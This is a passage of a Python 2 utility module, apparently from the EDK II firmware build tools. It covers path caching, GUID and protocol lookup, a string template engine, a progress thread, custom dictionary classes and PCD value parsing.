    @retval object  The unpickled object
    @retval None    If the file cannot be opened or unpickled
    """
    result = None
    handle = None
    try:
        handle = open(File, 'rb')
        result = pickle.load(handle)
    except Exception as e:
        EdkLogger.verbose("Failed to load [%s]\n\t%s" % (File, str(e)))
        result = None
    finally:
        if handle is not None:
            handle.close()
    return result
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
    """Case-tolerant lookup of real path names under a root directory.

    NOTE(review): _CACHE_ and _UPPER_CACHE_ are class-level attributes shared
    by every instance — confirm at most one root is ever cached per process.
    """
    _CACHE_ = set()          # real names seen so far (relative to root)
    _UPPER_CACHE_ = {}       # upper-cased name -> real name
    def __init__(self, Root):
        self._Root = Root
        for F in os.listdir(Root):
            self._CACHE_.add(F)
            self._UPPER_CACHE_[F.upper()] = F
    # =[] operator
    def __getitem__(self, Path):
        # Strip the root prefix; an empty remainder means the root itself.
        Path = Path[len(os.path.commonprefix([Path, self._Root])):]
        if not Path:
            return self._Root
        if Path and Path[0] == os.path.sep:
            Path = Path[1:]
        if Path in self._CACHE_:
            return os.path.join(self._Root, Path)
        UpperPath = Path.upper()
        if UpperPath in self._UPPER_CACHE_:
            return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
        IndexList = []
        LastSepIndex = -1
        SepIndex = Path.find(os.path.sep)
        # Find the deepest path component that is already cached.
        while SepIndex > -1:
            Parent = UpperPath[:SepIndex]
            if Parent not in self._UPPER_CACHE_:
                break
            LastSepIndex = SepIndex
            SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
        if LastSepIndex == -1:
            return None
        Cwd = os.getcwd()
        os.chdir(self._Root)
        SepIndex = LastSepIndex
        # Descend from the cached parent, caching each directory level found.
        while SepIndex > -1:
            Parent = Path[:SepIndex]
            ParentKey = UpperPath[:SepIndex]
            if ParentKey not in self._UPPER_CACHE_:
                os.chdir(Cwd)
                return None
            if Parent in self._CACHE_:
                ParentDir = Parent
            else:
                ParentDir = self._UPPER_CACHE_[ParentKey]
            for F in os.listdir(ParentDir):
                Dir = os.path.join(ParentDir, F)
                self._CACHE_.add(Dir)
                self._UPPER_CACHE_[Dir.upper()] = Dir
            SepIndex = Path.find(os.path.sep, SepIndex + 1)
        os.chdir(Cwd)
        if Path in self._CACHE_:
            return os.path.join(self._Root, Path)
        elif UpperPath in self._UPPER_CACHE_:
            return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
        return None
def RealPath(File, Dir='', OverrideDir=''):
    """Resolve File against Dir (then OverrideDir) through the global file cache."""
    resolved = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
    if not resolved and OverrideDir:
        resolved = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
    return resolved
def RealPath2(File, Dir='', OverrideDir=''):
    """Resolve File and split the result into (relative part, base directory).

    OverrideDir takes precedence; returns (None, None) when nothing resolves.
    """
    if OverrideDir:
        candidate = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
        if candidate:
            if OverrideDir[-1] == os.path.sep:
                return candidate[len(OverrideDir):], candidate[0:len(OverrideDir)]
            return candidate[len(OverrideDir) + 1:], candidate[0:len(OverrideDir)]
    candidate = None
    if GlobalData.gAllFiles:
        candidate = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
    if not candidate:
        # Fall back to the literal file system path.
        candidate = os.path.normpath(os.path.join(Dir, File))
        if not os.path.exists(candidate):
            return None, None
    if candidate:
        if Dir:
            if Dir[-1] == os.path.sep:
                return candidate[len(Dir):], candidate[0:len(Dir)]
            return candidate[len(Dir) + 1:], candidate[0:len(Dir)]
        return candidate, ''
    return None, None
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
    """Get GUID value for CName from the given packages.

    @param  CName       The CName of the GUID
    @param  PackageList List of packages to search
    @param  Inffile     The driver file (limits visibility of private GUIDs)

    @retval GuidValue   if CName is found in any given package
    @retval None        if CName is not found in any package
    """
    for Package in PackageList:
        visible = Package.Guids.keys()
        if Inffile and Package._PrivateGuids:
            # Private GUIDs are visible only to INFs inside the package tree.
            if not Inffile.startswith(Package.MetaFile.Dir):
                visible = [g for g in Package.Guids if g not in Package._PrivateGuids]
        if CName in visible:
            return Package.Guids[CName]
    return None
## Get Protocol value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def ProtocolValue(CName, PackageList, Inffile = None):
    """Get Protocol value for CName from the given packages.

    @param  CName       The CName of the Protocol
    @param  PackageList List of packages to search
    @param  Inffile     The driver file (limits visibility of private protocols)

    @retval value       if CName is found in any given package
    @retval None        if CName is not found in any package
    """
    for Package in PackageList:
        visible = Package.Protocols.keys()
        if Inffile and Package._PrivateProtocols:
            # Private protocols are visible only to INFs inside the package tree.
            if not Inffile.startswith(Package.MetaFile.Dir):
                visible = [p for p in Package.Protocols if p not in Package._PrivateProtocols]
        if CName in visible:
            return Package.Protocols[CName]
    return None
## Get PPI value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def PpiValue(CName, PackageList, Inffile = None):
    """Get PPI value for CName from the given packages.

    @param  CName       The CName of the PPI
    @param  PackageList List of packages to search
    @param  Inffile     The driver file (limits visibility of private PPIs)

    @retval value       if CName is found in any given package
    @retval None        if CName is not found in any package
    """
    for Package in PackageList:
        visible = Package.Ppis.keys()
        if Inffile and Package._PrivatePpis:
            # Private PPIs are visible only to INFs inside the package tree.
            if not Inffile.startswith(Package.MetaFile.Dir):
                visible = [p for p in Package.Ppis if p not in Package._PrivatePpis]
        if CName in visible:
            return Package.Ppis[CName]
    return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
    """String template engine supporting ${name} placeholders and
    ${BEGIN}...${END} repeated sections (see the module comment above)."""
    _REPEAT_START_FLAG = "BEGIN"
    _REPEAT_END_FLAG = "END"
    class Section(object):
        """One template fragment plus the placeholders found inside it."""
        _LIST_TYPES = [type([]), type(set()), type((0,))]
        def __init__(self, TemplateSection, PlaceHolderList):
            self._Template = TemplateSection
            self._PlaceHolderList = []
            # Split the section into sub-sections according to the position of placeholders
            if PlaceHolderList:
                self._SubSectionList = []
                SubSectionStart = 0
                #
                # The placeholders passed in must be in the format of
                #
                #   PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
                #
                for PlaceHolder, Start, End in PlaceHolderList:
                    self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
                    self._SubSectionList.append(TemplateSection[Start:End])
                    self._PlaceHolderList.append(PlaceHolder)
                    SubSectionStart = End
                if SubSectionStart < len(TemplateSection):
                    self._SubSectionList.append(TemplateSection[SubSectionStart:])
            else:
                self._SubSectionList = [TemplateSection]
        def __str__(self):
            return self._Template + " : " + str(self._PlaceHolderList)
        def Instantiate(self, PlaceHolderValues):
            """Substitute placeholder values; list-typed values repeat the section."""
            RepeatTime = -1
            RepeatPlaceHolders = {}
            NonRepeatPlaceHolders = {}
            for PlaceHolder in self._PlaceHolderList:
                if PlaceHolder not in PlaceHolderValues:
                    continue
                Value = PlaceHolderValues[PlaceHolder]
                if type(Value) in self._LIST_TYPES:
                    # All list-valued placeholders must share one repeat count.
                    if RepeatTime < 0:
                        RepeatTime = len(Value)
                    elif RepeatTime != len(Value):
                        EdkLogger.error(
                            "TemplateString",
                            PARAMETER_INVALID,
                            "${%s} has different repeat time from others!" % PlaceHolder,
                            ExtraData=str(self._Template)
                        )
                    RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
                else:
                    NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
            if NonRepeatPlaceHolders:
                StringList = []
                for S in self._SubSectionList:
                    if S not in NonRepeatPlaceHolders:
                        StringList.append(S)
                    else:
                        StringList.append(str(NonRepeatPlaceHolders[S]))
            else:
                StringList = self._SubSectionList
            if RepeatPlaceHolders:
                TempStringList = []
                for Index in range(RepeatTime):
                    for S in StringList:
                        if S not in RepeatPlaceHolders:
                            TempStringList.append(S)
                        else:
                            TempStringList.append(str(RepeatPlaceHolders[S][Index]))
                StringList = TempStringList
            return "".join(StringList)
    ## Constructor
    def __init__(self, Template=None):
        self.String = ''
        self.IsBinary = False
        self._Template = Template
        self._TemplateSectionList = self._Parse(Template)
    ## str() operator
    #
    #   @retval     string  The string replaced
    #
    def __str__(self):
        return self.String
    ## Split the template string into fragments per the ${BEGIN} and ${END} flags
    #
    #   @retval     list    A list of TemplateString.Section objects
    #
    def _Parse(self, Template):
        SectionStart = 0
        SearchFrom = 0
        MatchEnd = 0
        PlaceHolderList = []
        TemplateSectionList = []
        while Template:
            MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
            if not MatchObj:
                # No more placeholders: the remainder is the last section.
                if MatchEnd <= len(Template):
                    TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
                    TemplateSectionList.append(TemplateSection)
                break
            MatchString = MatchObj.group(1)
            MatchStart = MatchObj.start()
            MatchEnd = MatchObj.end()
            if MatchString == self._REPEAT_START_FLAG:
                # ${BEGIN} closes the preceding section and opens a repeated one.
                if MatchStart > SectionStart:
                    TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
                    TemplateSectionList.append(TemplateSection)
                SectionStart = MatchEnd
                PlaceHolderList = []
            elif MatchString == self._REPEAT_END_FLAG:
                # ${END} closes the repeated section.
                TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
                TemplateSectionList.append(TemplateSection)
                SectionStart = MatchEnd
                PlaceHolderList = []
            else:
                # Ordinary placeholder: record name and offsets within the section.
                PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
            SearchFrom = MatchEnd
        return TemplateSectionList
    ## Replace the string template with dictionary of placeholders and append it to previous one
    #
    #   @param      AppendString    The string template to append
    #   @param      Dictionary      The placeholder dictionaries
    #
    def Append(self, AppendString, Dictionary=None):
        if Dictionary:
            SectionList = self._Parse(AppendString)
            self.String += "".join(S.Instantiate(Dictionary) for S in SectionList)
        else:
            self.String += AppendString
    ## Replace the string template with dictionary of placeholders
    #
    #   @param      Dictionary      The placeholder dictionaries
    #
    #   @retval     str             The string replaced with placeholder values
    #
    def Replace(self, Dictionary=None):
        return "".join(S.Instantiate(Dictionary) for S in self._TemplateSectionList)
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
    """Prints progress characters on a background thread while a long task runs.

    State is class-level, so at most one progress display is active per process.
    """
    # for avoiding deadloop
    _StopFlag = None          # shared threading.Event used to stop the worker
    _ProgressThread = None    # the single background printer thread
    _CheckInterval = 0.25     # seconds between stop-flag polls

    ## Constructor
    #
    #   @param      OpenMessage     The string printed before progress charaters
    #   @param      CloseMessage    The string printed after progress charaters
    #   @param      ProgressChar    The charater used to indicate the progress
    #   @param      Interval        The interval in seconds between two progress charaters
    #
    def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
        self.PromptMessage = OpenMessage
        self.CodaMessage = CloseMessage
        self.ProgressChar = ProgressChar
        self.Interval = Interval
        if Progressor._StopFlag is None:
            Progressor._StopFlag = threading.Event()

    ## Start to print progress charater
    #
    #   @param      OpenMessage     The string printed before progress charaters
    #
    def Start(self, OpenMessage=None):
        if OpenMessage is not None:
            self.PromptMessage = OpenMessage
        Progressor._StopFlag.clear()
        if Progressor._ProgressThread is None:
            Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
            # '.daemon' replaces the deprecated setDaemon() call.
            Progressor._ProgressThread.daemon = False
            Progressor._ProgressThread.start()

    ## Stop printing progress charater
    #
    #   @param      CloseMessage    The string printed after progress charaters
    #
    def Stop(self, CloseMessage=None):
        OriginalCodaMessage = self.CodaMessage
        if CloseMessage is not None:
            self.CodaMessage = CloseMessage
        self.Abort()
        self.CodaMessage = OriginalCodaMessage

    ## Thread entry method
    def _ProgressThreadEntry(self):
        sys.stdout.write(self.PromptMessage + " ")
        sys.stdout.flush()
        TimeUp = 0.0
        # Poll the stop flag every _CheckInterval so Abort() stays responsive
        # even when the progress-character Interval is long.
        while not Progressor._StopFlag.is_set():   # is_set() replaces deprecated isSet()
            if TimeUp <= 0.0:
                sys.stdout.write(self.ProgressChar)
                sys.stdout.flush()
                TimeUp = self.Interval
            time.sleep(self._CheckInterval)
            TimeUp -= self._CheckInterval
        sys.stdout.write(" " + self.CodaMessage + "\n")
        sys.stdout.flush()

    ## Abort the progress display
    @staticmethod
    def Abort():
        if Progressor._StopFlag is not None:
            Progressor._StopFlag.set()
        if Progressor._ProgressThread is not None:
            Progressor._ProgressThread.join()
            Progressor._ProgressThread = None
## A dict which can access its keys and/or values orderly
#
# The class implements a new kind of dict which its keys or values can be
# accessed in the order they are added into the dict. It guarantees the order
# by making use of an internal list to keep a copy of keys.
#
class sdict(IterableUserDict):
    ## Constructor
    def __init__(self):
        IterableUserDict.__init__(self)
        self._key_list = []     # keys in insertion order
    ## [] operator
    def __setitem__(self, key, value):
        if key not in self._key_list:
            self._key_list.append(key)
        IterableUserDict.__setitem__(self, key, value)
    ## del operator
    def __delitem__(self, key):
        self._key_list.remove(key)
        IterableUserDict.__delitem__(self, key)
    ## used in "for k in dict" loop to ensure the correct order
    def __iter__(self):
        return self.iterkeys()
    ## len() support
    def __len__(self):
        return len(self._key_list)
    ## "in" test support
    def __contains__(self, key):
        return key in self._key_list
    ## indexof support
    def index(self, key):
        return self._key_list.index(key)
    ## insert support: place (newkey, newvalue) immediately BEFORE or AFTER
    #  the existing key, per 'order'; any other order value is a no-op
    def insert(self, key, newkey, newvalue, order):
        index = self._key_list.index(key)
        if order == 'BEFORE':
            self._key_list.insert(index, newkey)
            IterableUserDict.__setitem__(self, newkey, newvalue)
        elif order == 'AFTER':
            self._key_list.insert(index + 1, newkey)
            IterableUserDict.__setitem__(self, newkey, newvalue)
    ## append support (parameter intentionally keeps its historic name even
    #  though it shadows the class)
    def append(self, sdict):
        for key in sdict:
            if key not in self._key_list:
                self._key_list.append(key)
            IterableUserDict.__setitem__(self, key, sdict[key])
    def has_key(self, key):
        return key in self._key_list
    ## Empty the dict
    def clear(self):
        self._key_list = []
        IterableUserDict.clear(self)
    ## Return a copy of keys
    def keys(self):
        keys = []
        for key in self._key_list:
            keys.append(key)
        return keys
    ## Return a copy of values
    def values(self):
        values = []
        for key in self._key_list:
            values.append(self[key])
        return values
    ## Return a copy of (key, value) list
    def items(self):
        items = []
        for key in self._key_list:
            items.append((key, self[key]))
        return items
    ## Iteration support
    def iteritems(self):
        return iter(self.items())
    ## Keys interation support
    def iterkeys(self):
        return iter(self.keys())
    ## Values interation support
    def itervalues(self):
        return iter(self.values())
    ## Return value related to a key, and remove the (key, value) from the dict
    def pop(self, key, *dv):
        value = None
        if key in self._key_list:
            value = self[key]
            self.__delitem__(key)
        elif len(dv) != 0 :
            # BUGFIX: the varargs tuple is named 'dv', not 'kv'; the old code
            # raised NameError whenever the key was missing and a default
            # value was supplied.
            value = dv[0]
        return value
    ## Return (key, value) pair, and remove the (key, value) from the dict
    def popitem(self):
        key = self._key_list[-1]
        value = self[key]
        self.__delitem__(key)
        return key, value
    def update(self, dict=None, **kwargs):
        if dict is not None:
            for k, v in dict.items():
                self[k] = v
        if len(kwargs):
            for k, v in kwargs.items():
                self[k] = v
## Dictionary with restricted keys
#
class rdict(dict):
    ## Constructor: every key in KeyList is pre-created with an empty-string
    #  value; only those keys may ever be assigned afterwards.
    def __init__(self, KeyList):
        for Key in KeyList:
            dict.__setitem__(self, Key, "")
    ## []= operator: assigning a key outside the permitted set is a fatal
    #  build error.
    def __setitem__(self, key, value):
        if key not in self:
            EdkLogger.error("RestrictedDict", ATTRIBUTE_SET_FAILURE, "Key [%s] is not allowed" % key,
                            ExtraData=", ".join(dict.keys(self)))
        dict.__setitem__(self, key, value)
    ## =[] operator: unknown keys read back as an empty string.
    def __getitem__(self, key):
        return dict.__getitem__(self, key) if key in self else ""
    ## del operator is forbidden
    def __delitem__(self, key):
        EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="del")
    ## Empty the dict: values are reset but the key set is preserved.
    def clear(self):
        for Key in self:
            dict.__setitem__(self, Key, "")
    ## pop is forbidden
    def pop(self, key, *dv):
        EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="pop")
    ## popitem is forbidden
    def popitem(self):
        EdkLogger.error("RestrictedDict", ATTRIBUTE_ACCESS_DENIED, ExtraData="popitem")
## Dictionary using prioritized list as key
#
# A fixed-depth nested dictionary whose keys may be scalars or lists/tuples
# of per-level keys.  A key that is None or one of _ValidWildcardList is
# normalized to the wildcard 'COMMON', which matches any entry at that level.
class tdict:
    _ListType = type([])
    _TupleType = type(())
    _Wildcard = 'COMMON'
    _ValidWildcardList = ['COMMON', 'DEFAULT', 'ALL', '*', 'PLATFORM']
    def __init__(self, _Single_=False, _Level_=2):
        # _Single_: lookups return only the first match; otherwise all matches.
        # _Level_: number of nested key levels in this (sub-)dictionary.
        self._Level_ = _Level_
        self.data = {}
        self._Single_ = _Single_
    # =[] operator
    def __getitem__(self, key):
        # Split the (possibly compound) key into this level's key and the
        # remaining keys; missing trailing levels are padded with wildcards.
        KeyType = type(key)
        RestKeys = None
        if KeyType == self._ListType or KeyType == self._TupleType:
            FirstKey = key[0]
            if len(key) > 1:
                RestKeys = key[1:]
            elif self._Level_ > 1:
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        else:
            FirstKey = key
            if self._Level_ > 1:
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        if FirstKey is None or str(FirstKey).upper() in self._ValidWildcardList:
            FirstKey = self._Wildcard
        if self._Single_:
            return self._GetSingleValue(FirstKey, RestKeys)
        else:
            return self._GetAllValues(FirstKey, RestKeys)
    def _GetSingleValue(self, FirstKey, RestKeys):
        # Return the first value reachable via FirstKey/RestKeys, falling
        # back to the wildcard entry (or, for a wildcard key, any entry).
        Value = None
        #print "%s-%s" % (FirstKey, self._Level_) ,
        if self._Level_ > 1:
            if FirstKey == self._Wildcard:
                if FirstKey in self.data:
                    Value = self.data[FirstKey][RestKeys]
                if Value is None:
                    for Key in self.data:
                        Value = self.data[Key][RestKeys]
                        if Value is not None: break
            else:
                if FirstKey in self.data:
                    Value = self.data[FirstKey][RestKeys]
                if Value is None and self._Wildcard in self.data:
                    #print "Value=None"
                    Value = self.data[self._Wildcard][RestKeys]
        else:
            if FirstKey == self._Wildcard:
                if FirstKey in self.data:
                    Value = self.data[FirstKey]
                if Value is None:
                    for Key in self.data:
                        Value = self.data[Key]
                        if Value is not None: break
            else:
                if FirstKey in self.data:
                    Value = self.data[FirstKey]
                elif self._Wildcard in self.data:
                    Value = self.data[self._Wildcard]
        return Value
    def _GetAllValues(self, FirstKey, RestKeys):
        # Collect every value matching FirstKey/RestKeys including the
        # wildcard entry; sub-level results are concatenated, leaves appended.
        Value = []
        if self._Level_ > 1:
            if FirstKey == self._Wildcard:
                for Key in self.data:
                    Value += self.data[Key][RestKeys]
            else:
                if FirstKey in self.data:
                    Value += self.data[FirstKey][RestKeys]
                if self._Wildcard in self.data:
                    Value += self.data[self._Wildcard][RestKeys]
        else:
            if FirstKey == self._Wildcard:
                for Key in self.data:
                    Value.append(self.data[Key])
            else:
                if FirstKey in self.data:
                    Value.append(self.data[FirstKey])
                if self._Wildcard in self.data:
                    Value.append(self.data[self._Wildcard])
        return Value
    ## []= operator
    def __setitem__(self, key, value):
        KeyType = type(key)
        RestKeys = None
        if KeyType == self._ListType or KeyType == self._TupleType:
            FirstKey = key[0]
            if len(key) > 1:
                RestKeys = key[1:]
            else:
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        else:
            FirstKey = key
            if self._Level_ > 1:
                RestKeys = [self._Wildcard for i in range(0, self._Level_ - 1)]
        if FirstKey in self._ValidWildcardList:
            FirstKey = self._Wildcard
        # Lazily create the sub-dictionary for the next nesting level.
        if FirstKey not in self.data and self._Level_ > 0:
            self.data[FirstKey] = tdict(self._Single_, self._Level_ - 1)
        if self._Level_ > 1:
            self.data[FirstKey][RestKeys] = value
        else:
            self.data[FirstKey] = value
    def SetGreedyMode(self):
        # Greedy mode: lookups return all matches (applied recursively).
        self._Single_ = False
        if self._Level_ > 1:
            for Key in self.data:
                self.data[Key].SetGreedyMode()
    def SetSingleMode(self):
        # Single mode: lookups return only the first match (recursively).
        self._Single_ = True
        if self._Level_ > 1:
            for Key in self.data:
                self.data[Key].SetSingleMode()
    def GetKeys(self, KeyIndex=0):
        # Return the set of keys in use at nesting depth KeyIndex.
        assert KeyIndex >= 0
        if KeyIndex == 0:
            return set(self.data.keys())
        else:
            keys = set()
            for Key in self.data:
                keys |= self.data[Key].GetKeys(KeyIndex - 1)
            return keys
def IsFieldValueAnArray (Value):
    # A PCD field value is "array-like" when it is a GUID(...) invocation,
    # a multi-character (unicode) string/char literal, or a {...} byte list.
    # Note: the short-circuit order below preserves the original behavior
    # for an empty string (IndexError on Value[0]).
    Value = Value.strip()
    return (
        (Value.startswith(TAB_GUID) and Value.endswith(')'))
        or (Value.startswith('L"') and Value.endswith('"') and len(Value[2:-1]) > 1)
        or (Value[0] == '"' and Value[-1] == '"' and len(Value[1:-1]) > 1)
        or (Value[0] == '{' and Value[-1] == '}')
        or (Value.startswith("L'") and Value.endswith("'") and len(Value[2:-1]) > 1)
        or (Value[0] == "'" and Value[-1] == "'" and len(Value[1:-1]) > 1)
    )
def AnalyzePcdExpression(Setting):
    """Split a PCD setting string on TAB_VALUE_SPLIT ('|'), ignoring any
    separator that appears inside a quoted string or inside parentheses.

    Returns the list of stripped fields.
    """
    Setting = Setting.strip()
    # There might be escaped quote in a string: \", \\\" , \', \\\'
    Data = Setting
    # There might be '|' in string and in ( ... | ... ), replace it with '-'
    NewStr = ''
    InSingleQuoteStr = False
    InDoubleQuoteStr = False
    Pair = 0
    for Index, ch in enumerate(Data):
        if ch == '"' and not InSingleQuoteStr:
            # BUGFIX: at Index 0 the old test read Data[-1] (the *last*
            # character), wrongly treating a leading quote as escaped
            # whenever the string happened to end with a backslash.
            if Index == 0 or Data[Index - 1] != '\\':
                InDoubleQuoteStr = not InDoubleQuoteStr
        elif ch == "'" and not InDoubleQuoteStr:
            if Index == 0 or Data[Index - 1] != '\\':
                InSingleQuoteStr = not InSingleQuoteStr
        elif ch == '(' and not (InSingleQuoteStr or InDoubleQuoteStr):
            Pair += 1
        elif ch == ')' and not (InSingleQuoteStr or InDoubleQuoteStr):
            Pair -= 1
        # Mask protected separators in the shadow string; the real split
        # positions are then located in NewStr but sliced out of Setting.
        if (Pair > 0 or InSingleQuoteStr or InDoubleQuoteStr) and ch == TAB_VALUE_SPLIT:
            NewStr += '-'
        else:
            NewStr += ch
    FieldList = []
    StartPos = 0
    while True:
        Pos = NewStr.find(TAB_VALUE_SPLIT, StartPos)
        if Pos < 0:
            FieldList.append(Setting[StartPos:].strip())
            break
        FieldList.append(Setting[StartPos:Pos].strip())
        StartPos = Pos + 1
    return FieldList
def ParseDevPathValue (Value):
    """Convert a textual device path into a C byte-array initializer.

    Shells out to the external 'DevicePath' tool and reformats its output.
    Returns ('{b0,b1,...}', Size).  Raises BadExpression when the tool
    cannot be launched or reports an error.
    NOTE(review): under Python 3 'out' would be bytes; this module targets
    Python 2.
    """
    if '\\' in Value:
        # BUGFIX: str.replace() returns a new string; the original code
        # discarded the result, so backslashes were never normalized.
        Value = Value.replace('\\', '/').replace(' ', '')
    Cmd = 'DevicePath ' + '"' + Value + '"'
    p = None
    try:
        p = subprocess.Popen(Cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        out, err = p.communicate()
    except Exception as X:
        raise BadExpression("DevicePath: %s" % (str(X)) )
    finally:
        subprocess._cleanup()
        # BUGFIX: if Popen itself raised, 'p' was unbound and this cleanup
        # masked the real error with a NameError.
        if p is not None:
            p.stdout.close()
            p.stderr.close()
    if err:
        raise BadExpression("DevicePath: %s" % str(err))
    Size = len(out.split())
    out = ','.join(out.split())
    return '{' + out + '}', Size
def ParseFieldValue (Value):
    """Parse a PCD field value into (integer value, size in bytes).

    Accepts integers, UINTxx(...)/GUID(...) wrappers, C-style string and
    character literals (ASCII and L"unicode"), {...} byte arrays,
    DEVICE_PATH(...), hex/decimal numbers, and TRUE/FALSE.  Unrecognized
    strings are returned unchanged with size 1.
    NOTE: '/ 8' below is floor division only under Python 2 (this module's
    target); it would produce a float under Python 3.
    """
    if isinstance(Value, type(0)):
        return Value, (Value.bit_length() + 7) / 8
    if not isinstance(Value, type('')):
        raise BadExpression('Type %s is %s' %(Value, type(Value)))
    Value = Value.strip()
    # Fixed-width wrappers: parse the inner value and enforce its size.
    if Value.startswith(TAB_UINT8) and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 1:
            raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
        return Value, 1
    if Value.startswith(TAB_UINT16) and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 2:
            raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
        return Value, 2
    if Value.startswith(TAB_UINT32) and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 4:
            raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
        return Value, 4
    if Value.startswith(TAB_UINT64) and Value.endswith(')'):
        Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
        if Size > 8:
            raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
        return Value, 8
    if Value.startswith(TAB_GUID) and Value.endswith(')'):
        Value = Value.split('(', 1)[1][:-1].strip()
        if Value[0] == '{' and Value[-1] == '}':
            TmpValue = GuidStructureStringToGuidString(Value)
            if not TmpValue:
                raise BadExpression("Invalid GUID value string %s" % Value)
            Value = TmpValue
        if Value[0] == '"' and Value[-1] == '"':
            Value = Value[1:-1]
        try:
            # NOTE(review): CPython's uuid exposes the 'bytes_le' attribute,
            # not a get_bytes_le() method -- confirm the runtime in use.
            Value = "'" + uuid.UUID(Value).get_bytes_le() + "'"
        except ValueError as Message:
            raise BadExpression(Message)
        Value, Size = ParseFieldValue(Value)
        return Value, 16
    if Value.startswith('L"') and Value.endswith('"'):
        # Unicode String
        # translate escape character
        Value = Value[1:]
        try:
            Value = eval(Value)
        except:
            Value = Value[1:-1]
        List = list(Value)
        List.reverse()
        # Pack characters little-endian, 16 bits each; +1 for the NUL.
        Value = 0
        for Char in List:
            Value = (Value << 16) | ord(Char)
        return Value, (len(List) + 1) * 2
    if Value.startswith('"') and Value.endswith('"'):
        # ASCII String
        # translate escape character
        try:
            Value = eval(Value)
        except:
            Value = Value[1:-1]
        List = list(Value)
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 8) | ord(Char)
        return Value, len(List) + 1
    if Value.startswith("L'") and Value.endswith("'"):
        # Unicode Character Constant
        # translate escape character
        Value = Value[1:]
        try:
            Value = eval(Value)
        except:
            Value = Value[1:-1]
        List = list(Value)
        if len(List) == 0:
            raise BadExpression('Length %s is %s' % (Value, len(List)))
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 16) | ord(Char)
        return Value, len(List) * 2
    if Value.startswith("'") and Value.endswith("'"):
        # Character constant
        # translate escape character
        try:
            Value = eval(Value)
        except:
            Value = Value[1:-1]
        List = list(Value)
        if len(List) == 0:
            raise BadExpression('Length %s is %s' % (Value, len(List)))
        List.reverse()
        Value = 0
        for Char in List:
            Value = (Value << 8) | ord(Char)
        return Value, len(List)
    if Value.startswith('{') and Value.endswith('}'):
        # Byte array
        Value = Value[1:-1]
        List = [Item.strip() for Item in Value.split(',')]
        List.reverse()
        Value = 0
        RetSize = 0
        # Each element is parsed recursively and packed little-endian.
        for Item in List:
            ItemValue, Size = ParseFieldValue(Item)
            RetSize += Size
            for I in range(Size):
                Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
        return Value, RetSize
    if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
        Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
        Value = Value.strip().strip('"')
        return ParseDevPathValue(Value)
    if Value.lower().startswith('0x'):
        try:
            Value = int(Value, 16)
        except:
            raise BadExpression("invalid hex value: %s" % Value)
        if Value == 0:
            return 0, 1
        return Value, (Value.bit_length() + 7) / 8
    if Value[0].isdigit():
        Value = int(Value, 10)
        if Value == 0:
            return 0, 1
        return Value, (Value.bit_length() + 7) / 8
    if Value.lower() == 'true':
        return 1, 1
    if Value.lower() == 'false':
        return 0, 1
    return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
